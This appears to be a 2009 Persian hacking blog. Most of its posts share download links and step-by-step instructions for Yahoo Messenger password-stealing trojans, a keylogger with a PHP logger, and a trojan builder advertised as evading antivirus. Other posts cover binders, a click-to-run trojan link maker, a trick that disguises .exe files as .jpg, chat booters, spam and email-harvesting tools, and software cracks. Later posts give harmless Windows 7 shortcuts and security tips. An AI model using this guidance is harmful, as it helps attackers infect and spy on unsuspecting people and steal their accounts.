تروجان

با سلام خدمت کلیه بازدیدکنندگان و کاربران گرامی وب سایت بوت هک کرک.

جهت رفاه حال شما عزیزانی که وب‏سایت ترفندستان -اولین و بزرگ‏ترین وب‏سایت تخصصی ترفندهای کامپیوتر و اینترنت در ایران- را قابل دانسته و از آن بازدید می‏کنید، بر آن شدیم تا یک اینترنت رایگان Dialup بدون محدویت زمانی را به شما گرانمایگان هدیه نماییم. این اینترنت رایگان، با سرعت Dialup 56 Kb/S بوده و مخصوص کاربران شهر تهران می‏باشد. همانطور که ذکر شد محدودیتی از جانب میزان استفاده ندارد و هر چقدر که می‏خواهید می‏توانید از آن بهره ببرید. امید است این کار کوچک ما مورد پسند شما قرار گیرد. Username و Password و شماره جهت اتصال در ادامه آمده است.

Username: tarfandestan
Password: 9092304343
شماره اتصال: 9718170

نکته مهم: این ترفند فقط در تهران جواب میده

+ نوشته شده توسط سید در پنجشنبه نهم مهر 1388 و ساعت 11:29 |

لینک دانلود:

دانلود

اسکن در ادامه مطلب

منبع:http://www.hiddenhackers.blogfa.com

+ نوشته شده توسط سید در شنبه چهاردهم شهریور 1388 و ساعت 17:10 |

اینم از یه بوتر خوب و قوی

دانلـــــــود ::::

+ نوشته شده توسط سید در یکشنبه هجدهم مرداد 1388 و ساعت 21:29 |

یک برنامه عالی برای بدست آوردن Password در یاهو

1 . یک ID برای کار می گیره ( در دو کادر بالا یک ID با پسورد .وارد کنید)
2 . نام سرور هست . برای اینه که اگر به 10 نفر سرور دادید اشتباه نشه . شما می توانید اسم قربانی رو بنویشید
3 . YahooID است . یاهو ID اصلی خودتون رو وارد کنید .
4 . دو تیک بالا هم برای مخفی ماندن . سرور بزارید
4 . سپس کلید Create Server رو بزنید . یک فایل به اسم Yps (با آیکون فایل Jpg ) درست می شه .اونو باز نکنید !!! . فایل رو به شخصی که می خواهید هک کنید بدید تا باز کنه
. پس از اینکه شخص فایل رو باز کرد . دفعه بعد که یاهو رو باز کرد . پسورد . ID شخص بصورت PM برای ID اصلی شما .( از طرف ID که در دو کادر بالا وارد کردید ) برای شما ارسال و یا ...Off میشود

رمز : www.k2-4u.com
[ دریافت برنامه ]

+ نوشته شده توسط سید در یکشنبه هجدهم مرداد 1388 و ساعت 21:27 |

یک کیلاگر قوی به وسیله این برنامه می توانید هرچی که قربانی شما روی کیبرد تایپ کند ( با مشخصات پنجرها )
رو بصورت فایل متنی از ایمیل خودتون دریاقت کنید یا اونو بصورت txt بر روی سایت خودتون مشاهده کنید .
1 . فایل Loger.php واقع در پوشه برنامه رو روی سایتتون آپلود کنید . و آدرس اون فایل رو در کادر Url For ... وارد کنید (توجه سرور شما باید از PHP پشتیبانی کند و قابلیت نوشتن در فایل را داشته باشد )
. اگر کسی یک آموزش برای این برنامه درست کنه ممنون می شم و آدرسش رو اینجا می گذارم

رمز : www.k2-4u.com
[ دریافت برنامه ]

+ نوشته شده توسط سید در یکشنبه هجدهم مرداد 1388 و ساعت 21:26 |

OMEGA
موضوع »

¤

این برنامه قدرت هک را به شما نشان میدهد

password: milad

download: http://icqmail.persiangig.com/full.rar

+ نوشته شده توسط سید در جمعه دوازدهم تیر 1388 و ساعت 15:8 |

TELL SENDER
موضوع »

با این برنامه میتوانید شماره خانه افرادی که در چت می ایند را پیدا کنید

فقط کافی است مبایل خود را در محل مربوط بنویسید و سرور را بدین به قربانی.

password: milad

link dwonload : http://icqmail.persiangig.com/tell.rar

+ نوشته شده توسط سید در جمعه دوازدهم تیر 1388 و ساعت 15:7 |

وتر جدید OneBotDC که با یک آیدی لوگین میکنه و دیگه نیازی به تعداد زیادی آیدی بوت نیست
لینک عکس تست برنامه: http://i35.tinypic.com/qy9su8.jpg

..:: لینک دانلود ::..

+ نوشته شده توسط سید در سه شنبه بیست و دوم اردیبهشت 1388 و ساعت 22:10 |

تروجان

اينم يه تروجان براي سند كردن پسوورد ياهو مسنجر7.5 به بالاكارش خوبه

دانلود برنامه

تروجان/آي دي كريتور/مولتي ياهو

تروجان براي ياهو مسنجر تا۸.۱

يه تروجان براي سند كردن پسوورد ياهو مسنجر تا 8.1 كه شما مي تونيد به وسيله اين تروجان معين كنيد كه پسوورد به email شما فرستاده شود يا براي شما به صورت افلاين پيغام گذاشته شود و همچنين مي توانيد در قسمت binder تروجان را با فايل مورد نظر پيوند دهيد.

دانلود برنامه

آي دي كريتور

اينم يه آي دي كريتور هستش كه مي تونيد آي دي هاي زيادي رو به وسيله ي اين برنامه در مدت كم درست كنيد.

دانلود برنامه

ياهو مولتي كريتور

و يه ياهومولتي كركر ديگه كه تمام ورژن هاي ياهو رو كرك مي كنه .

دانلود برنامه

يه تروجان براي سند كردن پسوورد يا هو

اينم يه پسوورد سندر ديگه براي ياهو مربع هاي مورد نظر رو علامت زده و كريتور را بزنيد،توجه داشته باشيد هر چه تعداد مربع هاي تيك خورده زياد باشد حجم تروجان زياد شده و دادن آن به قرباني مشكل تر مي شود.

دانلود برنامه

+ نوشته شده توسط سید در سه شنبه بیست و دوم اردیبهشت 1388 و ساعت 22:7 |

به وسيله ي اين برنامه مي تونيد يك اي دي رو بمب يا بوت كنيد.

دانلود برنامه

+ نوشته شده توسط سید در سه شنبه بیست و دوم اردیبهشت 1388 و ساعت 22:6 |

به وسيله ي اين برنامه مي تونيد چت روم ها رو بوت كنيد.

دانلود برنامه

+ نوشته شده توسط سید در سه شنبه بیست و دوم اردیبهشت 1388 و ساعت 22:5 |

كار اين برنامه جمع آوري كردن ايميل از سطح سايتها و وبلاگ ها مي باشد البته اين برنامه مي تونه عكس jpg gif mp3&... رو نيز از روي سايتها و وبلاگ ها جمع آوري كند شما آدرس سايت مورد نظر رو مي نويسيد اين بر نامه به طور اتوماتيك تمام ايميل هاي موجود در سايت و همچنين ايميل هاي موجود در سايتهاي پيوند زده شده در آن وبلاگ و همچنين به طور اتوماتيك مي ره داخل وبلاگ ها . ايميل جمع آوري مي كنه.

دانلود برنامه

pass=www.biakarkon.blogfa.com

+ نوشته شده توسط سید در سه شنبه بیست و دوم اردیبهشت 1388 و ساعت 22:4 |

به وسیله ی این برنامه می تونید یک آی دی رو آنلاین کرده و روم مورد نظر رو انتخاب کنید هم برای افراد روم متن تبلیغ رو بفرستید و هم برای خود روم این برنامه با آخرین تغییرات سایت یاهو متابقت دارد(این چنین برنامه هایی به قیمت گزاف به فروش می رسد).

دانلود برنامه

pass=www.biakarkon.blogfa.com

+ نوشته شده توسط سید در سه شنبه بیست و دوم اردیبهشت 1388 و ساعت 22:3 |

Multi Messenger v8 for 8x,9x

برنامه ي مولتي مسنجر كه بر روي مسنجر ۸ و ۹ كار مي كنه و به وسيله ي اين برنامه مي تونيد با چند آي دي آنلاين شويد.

دانلود برنامه

pass=www.biakarkon.blogfa.com

+ نوشته شده توسط سید در سه شنبه بیست و دوم اردیبهشت 1388 و ساعت 22:2 |

مشخصات برنامه و علت متمایز بودن با برنامه ها همسان خود:

۱-دارای فایل پشتیبانی قوی پس نگران پاک شدن سرور از روی سیستم قربانی نشوید.

۲-دارای کد اینجکشن برای بدست آوردن پسورد یاهو و خوبی این کد این هست که توسط هیچ آنتی شناسایی نمیشه.

۳-اجرا شدن در تمامی کافی نت ها با تمام محدودیت ها.

۴-به راحتی از سیستم قربانی ایمیل می فرسته. از چند تل هاست هم استفاده می کنه که قدرت برنامه رو بالا می بره.

۵-هیچ آنتی ویروسی شناساییش نمی کنه.

۶-ارسال تمامی پسورد های Explorer

۷-ارسال : پسورد دیال آپ و آی پی ， یوزر ویندوز و اسم کامپیوتر

۸- مخفی ماندن در Msconfig , Taskmanager

۹-ساختن فایل تروجان با حجم دلخواه.

تذکر: امکان داره برنامه ساخت تروجان رو آنتی ویروس گیر بده پس اول قیر فعال کنید بعد بسازید بعد دوباره آنتی ویروس رو فعال کنید.

Download

+ نوشته شده توسط سید در دوشنبه هفدهم فروردین 1388 و ساعت 18:4 |

برای کسانی که ویسی کشی می کنند خیلی مفیده امیدوارم لذت ببرید. تست آنتی ویروس: Test Anti دانلود برنامه: Download عکس برنامه: \|


	Yak0za Group Created Link سلام دوستان این برنامه مخصوص تروجان باز های عزیزه و کارش اینه که از رویه سیستم شما یک فایل رو انتخاب میکنه (تروجان) و اون رو تبدیل به یک لینک میکنه و سپس لینک رو به شما میده هر کسی که روی اون لینک کلیک کنه تروجان شما بسته به حجمی که داره رویه سیستم طرف مقابل اجرا میشود. (اگه احتیاج به آموزش داشت تو قسمت نظرات بگید تا براتون بذارم) تست آنتی ویروس: Test Anti دانلود برنامه: Download عکس برنامه:


	Crack Super-Vox & X-Vox این هم کرک جدید برنامه S-VOX برنامه S-vox یه برنامه ی پولی برای یاهو است. که کارش هم گرفتن ویسی هست. با این برنامه و دانلود کردن S-vox می تونید به صورت مجانی از این برنامه به مدت ۲ سال استفاده کنید! تست آنتی ویروس: Test Anti لینک دانلود: Download عکس برنامه:


	Binder سلام دوستان امروز یه برنامه آوردم که ۲ تا فایل رو میتونید تبدیل به یک فایل کنید اسم برنامه ‌Binder هست. لینک تست آنتی ویروس: Test Anti لینک دانلود: Download عکس برنامه:

+ نوشته شده توسط سید در دوشنبه هفدهم فروردین 1388 و ساعت 18:1 |

همان‌طور که اطلاع دارید پس از مدت‌ها انتظار، پیش‌نمایش نسل بعدی سیستم‌ عامل ویندوز، با نام "ویندوز 7" در تاریخ 7 ژانویه 2009 عرضه شد. به گفته اکثر کارشناسان ویندوز 7 بسيار بهتر از ويستا بوده و طراحان موفق به برطرف كردن مشكلاتي شده‌اند كه كاربران سيستم مذكور را به ستوه آورده و ناراضي كرده بود. بنا بر پیش‌بینی ها و گفته‌های مسئولان مایکروسافت نسخه نهایی ویندوز 7 در تابستان 2009 عرضه خواهد شد. در ویندوز 7 امکانات و قابلیت‌های متعدد جدیدی نیز افزوده شده است. یکی از این قابلیت‌ها کلیدهای میانبر جدیدی است که در کل محیط ویندوز کاربرد دارد. هم‌اکنون به معرفی این کلیدهای میانبر جدید در ویندوز 7 می‌پردازیم. لازم به ذکر است کلیدهای میانبر سابق که در ویندوزهای قبلی کارایی داشت نیز همچنان برقرارند. لینک دانلود نسخه نمایشی ویندوز 7 و همچنین کرک دائمی آن نیز در ادامه موجود است.

لیست این کلیدهای میانبر جدید در کل محیط ویندوز 7 به شرح زیر است:

کلید Windows + ↑: بیشینه ساختن (Maximize) پنجره.
کلید Windows + ←: حرکت پنجره به سمت چپ. با انجام این عمل به صورت متمادی، کل پنجره به سمت چپ خواهد چرخید!
کلید Windows + →: حرکت پنجره به سمت راست. با انجام این عمل به صورت متمادی، کل پنجره به سمت راست خواهد چرخید!
کلید Windows + ↓: کمینه ساختن (Minimize) پنجره (ترفندستان) و بازگردانی پنجره از حالت بیشینه.
کلید Ctrl + Windows + ←: پرش به مانیتور سمت چپ.
کلید Ctrl + Windows + →: پرش به مانیتور سمت راست.
کلید Ctrl + Windows: کمینه ساختن (Minimize) و بازگردانی کلیه پنجره‌های باز.
کلید T + Windows: متمرکز شدن بر روی اولین پنجره موجود در Taskbar. با فشردن مجدد به پنجره بعدی موجود خواهید رفت و این گردش ادامه دارد. همچنین با فشردن کلید T + Shift+ Windows این گردش عقبگرد خواهد شد.
کلید Space + Windows: مشاهده دزدانه صفحه دسکتاپ! با این عمل، کلیه پنجره‌های باز، شفاف می‌شود به طوریکه صفحه دسکتاپ دیده شود.
کلید G + Windows: مرتب کردن کلیه Gadgetهای موجود به ترتیب حروف الفبا.
کلید P + Windows: تنظیمات (ترفندستان) نمایش خارجی نظیر Mirror ،Extend Desktop و غیره.
کلید X + Windows: صفحه Mobility Center مشابه ویندوز ویستا.
کلید Windows + #: باز نمودن پنجره شماره # موجود در Taskbar. به عنوان مثال برای باز نمودن اولین پنجره Taskbar کلیدهای Win+1 و برای باز نمودن سومین پنجره کلیدهای Win+3 را وارد می‌کنیم.
کلید Windows + +: بزرگ‌نمایی پنجره.
کلید Windows + -: کوچک‌نمایی پنجره.
Alt + P: نمایش و یا عدم نمایش صفحه پیش‌نمایش در هر پنجره.

همچنین کلیدهای ترکیبی زیر که به کمک ماوس صورت میگیرد مختص محیط Taskbar هستند:
Shift + کلیک بر روی یک آیکن: باز نمودن یک مورد جدید.
کلیک وسط ماوس بر روی یک آیکن: باز نمودن یک مورد جدید.
Shift + Ctrl + کلیک بر روی یک آیکن: باز نمودن یک مورد جدید با دسترسی ادمین.
Shift + راست کلیک بر روی یک آیکن گروهی شده: نمایش منوی پنجره شامل Restore All ،Minimize All ،Move All و غیره.
Ctrl + کلیک بر روی یک آیکن گروهی شده: گردش بر روی پنجره‌های موجود در این گروه.

لازم به ذکر است جهت اطلاع کاربران مبتدی، کلید Windows بین دو کلید Alt و Ctrl در سمت چپ کیبورد قرار دارد.

دانلود ویندوز 7، بیلد 7000، نسخه 32 بیتی، با حجم 2.44 گیگابایت از سایت مایکروسافت
دانلود ویندوز 7، بیلد 7000، نسخه 64 بیتی، با حجم 3.15 گیگابایت از سایت مایکروسافت
کرک دائمی ویندوز 7 و آموزش کرک

+ نوشته شده توسط سید در دوشنبه هفدهم فروردین 1388 و ساعت 17:56 |

حتمأ بارها برای شما پیش آمده است که هنگام ثبت نام در سایتها و یا ایجاد یک ID جدید در یاهو ، برای خود یک Password تعیین کنید. اما آیا تاکنون به این موضوع توجه کرده اید که پسوردهای ساده همانند اسم ها و تاریخ تولد، بسیار ساده لو میروند؟ اکنون 7 راه بسیار مفید را به شما معرفی خواهیم کرد که با استفاده از آنها میتوانید بهترین رمزهای عبور را برای خود تعیین کنید ، رمزهایی که در عین پیچیدگی در خاطر شما میمانند!

1- برای ایجاد کلمه عبور، از حروف بزرگ و کوچک و به صورت یک در میان و غیر متناوب استفاده کنید. مثال: TaRfAnDeStAn

2- حروف اول کلمات یک جمله را به عنوان رمز عبور خود انتخاب کنید. مثلأ در جمله "If sentence is longer password would be safer" که رمز عبور آن Isilpwbs میشود.

3- عدد یا تاریخی را برای خود در نظر بگیرید و آن را با دکمه Shift تایپ کنید. مثلأ تاریخ 13.06.2002 با دکمه Shift به این کلمه تبدیل می شود: !#>)^>@))@

4- لغتی را در نظر بگیرید (ترفندستان) و سپس حروف سمت راست آن را که بر روی صفحه کلید قرار دارد، بنویسید: مثال: Hardware تبدیل می شود به Jstfestr

5-لغت یا ترکیبی را برای خود در نظر بگیرید مانند “24October” و بعد آن را بهم بریزید به این صورت که حروف اول آن را با حرف آخر، حرف دوم را با حرف ماقبل آخر و به همین ترتیب بقیه را بنویسید: 24r4eObcot

6- لغات یک جمله را به اختصار بنویسید؛ این اختصارات را خود شما تعیین می کنید و از قاعده خاصی پیروی نمی کنند. مثلأ عبارت White meat with cabbage تبدیل می شود به whtmtwtcabge

7- در رمز عبور از علائم ویژه استفاده کنید. مثال: “c/Om%u §E~r

+ نوشته شده توسط سید در دوشنبه هفدهم فروردین 1388 و ساعت 17:49 |

در صورتی که به مسائل هک و تروجان های آن آشنا باشید قصد داریم ترفندی برای شما بازگو کنیم. مطمئنأ میدانید در صورتی که با استفاده از برنامه های تروجان ساز یک تروجان بسازید، فرمت این فایل سرور exe. خواهد بود. اما ما قصد داریم تا ترفندی کوچک را به شما آموزش دهیم که با استفاده از آن میتوانید بدون نیاز به نرم افزار خاصی در عین حالی که فرمت فایل exe است اما با فرمت jpg. و یا هر فرمتی که شما دوست دارید نمایش داده شود.

برای این کار:
ابتدا دقت کنید که سیستم شما قابلیت نمایش فرمتهای فایل ها را داشته باشد. برای فهمیدن این موضوع My Computer را باز کرده و از منوی Tools به Folder Options بروید. سپس تب View را باز کرده و دقت کنید که گزینه Hide extensions for known file types تیک نخورده باشد.
حال (ترفندستان) سراغ اصل مطلب برویم.
فایل مورد نظر که فرمت exe دارد را بیابید و بر روی آن راست کلیک کرده و Rename را انتخاب کنید. سپس قبل از exe. عبارت jpg. را تایپ نمایید (و یا هر فرمتی که دوست دارید). که به عنوان مثال فایلی با نام tarfandestan.exe به شکل tarfandestan.jpg.exe در خواهد آمد.
حال میبایست پس از عبارت jpg. دست خود را بر روی دکمه Space کیبورد نگاه داشته و بیش از 20 بار این کلید را بفشارید.
سپسEnter را بزنید.
خواهید دید که تنها فرمت jpg. به چشم میخورد و تنها نشانه ای که از exe. به چشم میخورد سه نقطه ای است که در سمت دیگر آیکون وجود دارد که اصلأ جلب توجه نمیکند.

+ نوشته شده توسط سید در دوشنبه هفدهم فروردین 1388 و ساعت 17:47 |

شاید برای شما نیز پیش آمده باشد که بر روی هارد سیستم خود فایل مشکوکی داشته باشید و از آلوده بودن آن به ویروس اطلاع مطمئن نباشید. در این زمان ممکن است آنتی ویروسی نصب کرده و فایل را اسکن کنید. طبعأ با این روش فایل شما تنها با یک آنتی ویروس اسکن میشود و هر چقدر هم آنتی ویروس قوی باشد امکان خطا وجود دارد و اگر همان فایل را با آنتی ویروسی دیگر چک کنید شاید نتیجه چیز دیگری باشد. همچنین مشکلاتی اعم از آپدیت آنتی ویروس ها، مشکلات مربوط به رجیستر آنها و مسائل اینچنینی نیز وجود دارد که کاربران را از استفاده بهینه از آنتی ویروس ها ناتوان میکند. اما هم اکنون قصد داریم ترفندی را برای شما معرفی کنیم که این مشکل به بهترین شکل حل شود! شما هم اکنون میتوانید به وسیله سرویسی آنلاین فایل های خود را با 37 آنتی ویروس به شکل همزمان اسکن نمایید! سپس نتیجه آزمایش این 37 آنتی ویروس را مشاهده کنید! تقریبأ تمامی آنتی ویروس های معتبر و معروف در این زمینه گردآوری شده اند که شما میتوانید فایل های خود را به وسیله آنها اسکن نمایید. این راه قطعأ جامع ترین روش برای اطمینان از ویروسی بودن یک فایل است. آنتی ویروس های استفاده شده در این روش از آخرین آپدیت های امنیتی نیز بهره میبرند.

بدین منظور:
شما کافی است به آدرس http://www.virustotal.com مراجعه کنید.
حالا میتوانید فایل مورد نظر خود را از روی هارد Browse کرده و دکمه Send File را بزنید.
اکنون (ترفندستان) بسته به حجم فایل شما و سرعت اینترنت تان اندک زمانی اعلام نتیجه طول میکشد.
پس از آپلود و اسکن فایل، نتیجه آزمایش فایل با 37 آنتی ویروس به شکلی منظم و مرتب درج میگردد که در صورت ویروسی بودن فایل نوع ویروس تشخیص داده شده نیز ثبت میشود.
اگر چندین فایل مشکوک دارید کافی است آنها را در یک فایل فشرده ذخیره کنید و سپس فایل فشرده را آپلود و اسکن نمایید.
از آنجایی که فایل های مشکوک به ویروسی بودن حجم زیادی ندارند این روش بسیار سریع نیز خواهد بود.

همچنین شما میتوانید جهت سهولت کار از ابزار معرفی شده در http://www.virustotal.com/metodos.html جهت اسکن فایل ها از این روش در محیط ویندوز بهره ببرید

+ نوشته شده توسط سید در دوشنبه هفدهم فروردین 1388 و ساعت 17:46 |

كامپيوتر شما، چه سه ساله باشد، چه سه روزه، با مشكلات امنيتي يكساني مواجه است كه گاهي بسيار خطرناك هستند. ويروس‌ها مي‌خواهند به محض آمدنتان به روي خط، وارد سيستمتان شوند. جاسوس‌افزارها بر پشت نامه‌ها سوار‌مي‌شوند و سعي مي‌كنند همراه با تبليغات وارد سيستم شما شوند. تروجان‌ها در كمين مي‌نشينند و با اولين غفلت، نفوذ‌مي‌كنند. راه‌هاي مختلفي براي مقابله با اين خطرات وجود دارد. در این ترفند سعي خواهيم‌كرد ضمن معرفي خطرات امنيتي، روش‌هاي مقابله با هر يك را توضيح دهيم. لازم به ذكر است كه اين نكات هيچ ترتيب خاصي ندارد و اولويت در مطرح كردن هر يك از آن‌ها، دليل مهم بودن آن برساير موضوعات نيست.

هشدارهاي امنيتي را جدي نگيريد!
پنجره‌هاي pop up به خودي خود مزاحم هستند؛ چه برسد به اين كه هشدار بدهند سيستم شما داراي يك مشكل امنيتي است. فروشندگان محصولاتي كه ظاهراً نرم‌افزارهاي‌‌امنيتي هستند، با ترساندن كاربران ساده و بي‌دقت، آن‌ها را ترغيب به دانلود نرم‌افزارهاي مزبور‌مي‌كنند، يا آن‌ها را طوري از خطري كه وجود ندارد مي‌ترسانند كه مجبور‌شوند حداقل سري به سايتشان بزنند. بعيد است تا‌كنون با چنين پنجره‌هاي هشدارآميزي هنگام گشت‌زدن در وب مواجه نشده‌‌باشيد.

بعضي وقت‌ها شكل پنجره‌ها طوري است كه گويا از طرف ويندوز هشدار مي‌دهد. اما چنين نيست و اين‌ها فقط تبليغ هستند. گاهي يك علامت كمرنگ <تبليغ> در پايين اين پنجره آمده است. ولي طراحي صفحه طوري است كه كاربر به آنجا توجه نمي‌كند و فكر مي‌كند هر چه زودتر بايد كاري بكند. به همين‌خاطر، بي‌محابا روي دكمهYes كليك مي‌كند تا شايد نجات يابد. اما روي هر چه كليك كند (چه Yes ، چهNo، چه هر جاي ديگر)، به سايت فروشنده هدايت مي‌شود تا نرم‌افزار را دانلود كند.

در اينجا قصد نداريم اسمي از چنين فروشنده‌هايي بياوريم يا محصول خاصي را نام ببريم. مهم اين است كه هر كس مي‌تواند يك صفحه وب pop up را طوري طراحي كند كه شبيه به كادرهاي ويندوز باشد و كاربر فكر‌كند واقعاً با يك مشكل امنيتي مواجه شده كه ويندوز دارد هشدار مي‌دهد. حتي بعضي از آن‌ها با جعل المان‌هاي ويندوز (مثل منوي programs) براي كاربرِ از همه جا بي‌خبر، هيچ ترديدي را باقي نمي‌گذارند كه كل قضيه را باور كند. حال‌آن‌كه ماجرا به‌كلي دروغ است.

حال سؤال اين است كه چگونه مي‌توان چنين پنجره‌هايي را از هشدارهاي واقعي ويندوز تشخيص داد. اولاً حتي اگر وحشتناك‌ترين هشدار را هم ديديد، نبايد هول شويد و عجولانه كاري بكنيد. ثانياً اگر به خط عنوان و پايين صفحه نگاه كنيد، حتماً مي‌توانيد تشخيص‌دهيد كه يك پنجره Internet‌‌Explorer است يا پنجره‌اي جعلي. البته اين صرفاً سرنخ است و برهان قاطع نيست.

واقعاً ممكن است ويندوز يا يكي از نرم‌افزارهاي نصب شده در سيستم ‌شما (از جمله برنامه ضدويروس‌) چنين پنجره‌اي را ظاهر كرده باشد. اما احتمال اين حالت خيلي ضعيف است و شما در اكثر موارد مي‌توانيد فرض بگيريد كه با يك پنجره تبليغاتي مواجه هستيد. ولي اگر مردد هستيد، روي پنجره كليكِ راست كنيد و گزينه Properties را بزنيد.

با اين كار معلوم مي‌شود كه صفحه از طرف كدام سايت نشان داده شده است. ديالوگ كادرهاي واقعي IE گونه، آدرس غيراستانداردي دارند كه با چيزي مثل: ‌res آغاز مي‌شود. اما پنجره‌هاي تبليغاتي يك آدرس واقعي وب دارند. مهم اين است كه عجولانه نسبت به پيام عكس‌العمل نشان ندهيد، بلكه مكث كنيد و با دقت پيام را بخوانيد. خيلي اوقات از محتواي پيام هم مي‌توان به دروغ بودن آن پي برد.

مراقب آرشيو مكاتبات آنلاين باشيد
فهرست‌هاي پستي (mailing list) مرجع خوبي براي به دست آوردن هر نوع اطلاعات هستند؛ به ويژه آرشيو اين فهرست‌ها كه به اينترنت پست شده‌اند. پيام‌هايي كه در اين فهرست‌ها بين اعضا رد و بدل مي‌شود، غالباً به صورت آرشيوهاي قابل جستجو در دسترس هستند و جستجوگراني چون گوگل و غيره آن‌ها را پيدا مي‌كنند. با اين كه اين مجموعه مكاتبات نعمت بزرگي براي محققان هستند، اما مي‌توانند پناهگاه ويروس‌ها و ساير خطرات اينترنتي هم باشند.

اگر سرور آرشيوكننده نظارتي بر ويروس‌ها نداشته‌‌باشد و ضمايم نامه‌ها را آزاد بگذارد، ممكن است پيام‌هايي را آرشيو كرده باشد كه حاوي فايل‌هاي آلوده‌كننده هستند. خودتان مي‌توانيد امتحان كنيد. مثلاً در گوگل به جستجوي فايل postcard.pif بپردازيد، يعني فايل آلوده‌اي كه در بسياري از كرم‌هاي سري W32/Netsky به كار رفته‌است. نتيجه جستجو قطعاً پر از لينك‌هايي به پيام‌هايي در آرشيو فهرست‌هاي پستي خواهد بود كه نسخه فعالي از اين ويروس را به عنوان ضميمه دارند. كليك روي يكي از اين ضمايم در آرشيوهاي مزبور، سيستم را بلافاصله آلوده مي‌كند.

نرم‌افزار ضدجاسوسي و ضدتبليغاتي را به‌درستي انتخاب كنيد
امروزه جاسوسي اينترنتي، براي كاربران كامپيوتر به واقعيتي گريزناپذير تبديل شده است. حاصل كمي غفلت هنگام گشت‌زدن در وب، ممكن است مرورگر <هاي‌جك> شده، كوكي‌هاي متجاوز و پاپ‌آپ‌هاي تمام‌نشدني باشد. بسياري از كاربران براي اين‌كه از شر اين پليدي‌هاي اينترنت در امان بمانند، به نرم‌افزارهاي ضدجاسوسي
(antispyware) پناه مي‌برند.

اما اگر انتخاب برنامه‌هاي ضدجاسوسي و ضدتبليغاتي از روي دقت صورت نگيرد، درمان ممكن است بدتر از خود مرض از آب در بيايد. اگر به دنبال راهي براي مقابله با پاپ‌آپ‌ها هستيد، گوگل، ياهو و MSN ابزارهاي خوبي براي مسدود‌كردن اين پنجره‌ها را به‌طور رايگان عرضه ‌‌مي‌كنند.

خود اينترنت اكسپلورر، اگر سرويس‌پك 2 ويندوز اكس‌پي را نصب كرده باشيد، يك pop up blocker قوي دارد. بسياري از برنامه‌هاي ضدويروس خوب هم امروزه به پاپ‌آپ بلاكر مجهزند. بنابراين نيازي به تهيه جداگانه اين برنامه نيست.

مشهورترين برنامه‌هاي ضد‌جاسوسي در حال حاضر، سه محصول Ad-Aware ،Spybot Search and Destroy وSpySweeper هستند. كه تمام آن‌ها نسخه رايگان هم دارند. نسخه رايگان اين برنامه‌ها، هم اسكن‌‌مي‌كند و هم بيشتر جاسوس‌افزارها، تبليغ‌افزارها و به‌طوركلي كدهاي پليد را از بين‌‌مي‌برد. اما يك سري از برنامه‌هاي ضد‌جاسوسي هم وجود‌‌دارند كه به برنامه‌هاي <ولگرد> يا <مشكوك> موسومند.

اين برنامه‌ها از طريق يك پاپ‌آپ تبليغ مي‌شوند كه مدعي است هر پليدافزاري را از روي سيستم شما پاك مي‌كند با اين‌حال اين برنامه‌ها به قدري سمج هستند و آن قدر كاربر را تحت فشار‌‌مي‌گذارند تا مجبور‌شود پيشنهاد دانلود را بپذيرد.

يكي از نشانه‌هاي برنامه‌هاي ولگرد اين است كه دانلود و اسكن به طور رايگان انجام مي‌شود. اما موقع پاك كردن كه مي‌رسد، مي‌گويند بايد برنامه را بخريد. حتي بعضي از آن‌ها به دروغ اعلام مي‌كنند كه سيستم گرفتار جاسوس‌افزار است و كاربر را مجاب مي‌كنند كه برنامه را بخرد. بدترين نمونه از اين نرم‌افزارها، كه برخي سايت‌ها آن‌ها را <اخاذافزار /‌extortion-ware> ناميده‌اند، خودشان در سيستم مشكل ايجا مي‌كنند و حتي uninstall هم نمي‌شوند و كاربر را مجبور مي‌كنند براي گرفتن uninstaller، خود نرم‌افزار را بخرند.

حال سؤال اين است كه چه بايد كرد؟ چگونه مي‌توان يك محصول قانوني و مشروع را از يك برنامه فريبكار و نامشروع تشخيص داد؟ يك قاعده كلي اين است كه اگر فروشنده‌اي تبليغ كند كه نرم‌افزارش سيستم شما را از شر جاسوس‌افزارها و تبليغات خلاص مي‌كند، به احتمال زياد خودش جاسوس‌افزار است. تبليغات پاپ‌آپ و banner غالباً ادعا‌‌مي‌كنند كه سيستم به جاسوس‌افزار آلوده شده‌است.

گرچه بعضي از محصولات تجاري ضدجاسوسي پيشنهاد اسكن رايگان سيستم را ارائه مي‌دهند، ولي پيشا‌پيش ادعا نمي‌كنند كه كامپيوترتان آلوده است.

طبق يك نظرسنجي كه شركت‌هاي WebRoot و AOL انجام داده‌اند، بيش از 90‌درصد كاربران كامپيوتر، در سيستم خود شكلي از جاسوس‌افزار را دارند. بنابراين، اسكن مستمر سيستم، يك ضرورت است. ابتدا از يكي از اين اسكنرها و پاك‌كننده‌هاي رايگان استفاده‌‌كنيد. سايت SpywareWarrior.com فهرستي از نود برنامه آزمايش شده را ارائه داده است كه <در ضدجاسوس‌افزار بودن آن‌ها ترديد وجود دارد>. با اين كه تمام برنامه‌هايي كه در اين سايت معرفي شده‌اند ممكن است بد نباشند، ولي منطق حكم مي‌كند به طرف آن‌ها نرويد.

بعضي از سايت‌هايي كه برنامه‌هاي ضد‌جاسوسي ولگرد را تبليغ‌مي‌كنند و سايت‌هايي كه خودشان به انتشار جاسوس‌افزار و كدهاي مخرب مي‌پردازند، با استفاده از نقاط ضعف ويندوز و اينترنت اكسپلورر، نصب‌هاي <تحميلي> انجام مي‌دهند و به نمايش پاپ‌آپ‌هاي تمام‌نشدني مي‌پردازند. بروز نگه‌داشتن ويندوز يكي از آسان‌ترين راه‌ها براي مقاوم‌شدن در برابر اين تهديدات است. از آنجا كه بعضي برنامه‌هاي ضد‌ويروس، قابليت‌هاي ضدجاسوسي هم دارند، بروز نگه‌داشتن آن‌ها هم كار خوبي است.

Spybot S&D ،SpySweeper و برخي ديگر از محصولات خوشنام نيز سيستم شما را در مقابل بعضي از اين سايت‌ها مقاوم مي‌كنند. قابليت معرفي سايت‌هاي ناامن در منطقه امنيتي اينترنت اكسپلورر (Security Zone) يكي از ويژگي‌هاي خوب اين مرورگر است كه به آساني در دسترس است. سايت SpywareGuide.com فهرستي از سايت‌هاي مخرب را به‌طور رايگان ارائه مي‌دهد كه مي‌توانيد به Security‌Zone اينترنت اكسپلورر معرفي كنيد.

بلوكه كردن پاپ‌آپ‌ها، راه ديگري براي مواجهه با اين مشكل است. اگر از سيستم‌عاملي غير از ويندوز اكس‌پي استفاده مي‌كنيد، يا هنوز سرويس‌پك2 ويندوز اكس‌پي را نصب نكرده‌ايد، مي‌توانيد از برنامه‌هاي شركت‌هاي ديگر، مثل MSN، ياهو و يا گوگل براي مسدود‌كردن پاپ‌آپ‌ها استفاده كنيد.

